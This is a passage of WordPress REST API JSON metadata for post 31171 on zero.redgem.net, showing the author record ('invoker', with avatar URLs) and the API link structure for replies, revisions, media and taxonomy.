redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31171","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=31171"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31171\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=31171"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=31171"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=31171"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}